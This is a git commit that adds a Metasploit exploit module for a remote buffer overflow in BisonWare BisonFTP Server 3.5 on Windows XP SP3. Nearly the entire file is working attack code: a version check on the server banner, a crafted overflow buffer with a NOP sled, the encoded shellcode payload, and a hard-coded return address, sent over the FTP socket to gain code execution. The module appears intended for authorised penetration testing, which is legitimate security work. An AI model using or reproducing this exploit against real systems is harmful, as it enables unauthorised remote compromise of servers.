Create bison_ftp_bof.rb

2015-11-20 09:07:40 +08:00 · 2015-11-20 09:07:40 +08:00 · fcc7520230
parent 7c5d292e42
commit fcc7520230
1 changed files with 91 additions and 0 deletions
--- a/modules/exploits/windows/ftp/bison_ftp_bof.rb
+++ b/modules/exploits/windows/ftp/bison_ftp_bof.rb
@ -0,0 +1,91 @@
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 require 'msf/core'
 class Metasploit4 < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::Ftp
  def initialize(info = {})
    super(update_info(info,
      'Name'			 => 'BisonWare BisonFTP Server Buffer Overflow',
      'Description'	 => %q{
        BisonWare BisonFTP Server 3.5 is prone to an overflow condition.
        This module exploits a buffer overflow vulnerability in the said
        application.
      },
      'Platform'		 => 'win',
      'Author'		 =>
        [
          'localh0t', # initial discovery
          'veerendragg @ SecPod', # initial msf
          'Jay Turla' # msf
        ],
      'License'		 => MSF_LICENSE,
      'References'	 =>
        [
          [ 'CVE', '1999-1510'],
          [ 'BID', '49109'],
          [ 'EDB', '17649'],
          [ 'URL', 'http://secpod.org/msf/bison_server_bof.rb']
        ],
      'Privileged'	 => false,
      'DefaultOptions' =>
        {
          'VERBOSE'  => true
        },
      'Payload'		 =>
        {
          'Space'          => 385,
          'BadChars'       => "\x00\x0a\x0d",
        },
      'Targets'		=>
        [
          [ 'Bisonware FTP Server / Windows XP SP3 EN',
            {
              'Ret' => 0x0040333f,
              'Offset'   => 1432
            }
          ],
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Aug 07 2011'))
  end
  def check
    connect_login
    disconnect
    if /BisonWare BisonFTP server product V3\.5/i === banner
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end
  def exploit
    connect
    print_status('Triggering the prompt for an unregistered product')
    sock.put('')
    print_status('Disconnecting...')
    disconnect
    print_status('Connecting for the second time to deliver our payload...')
    connect #connect for the second time
    buf = rand_text_alpha(1028)
    buf << "\x90" * 16
    buf << payload.encoded
    buf << "\x90" * (388 - payload.encoded.length)
    buf << [target.ret].pack('V')
    buf << rand_text_alpha(39)
    print_status('Sending payload...')
    sock.put(buf)
    handler
    disconnect
  end
 end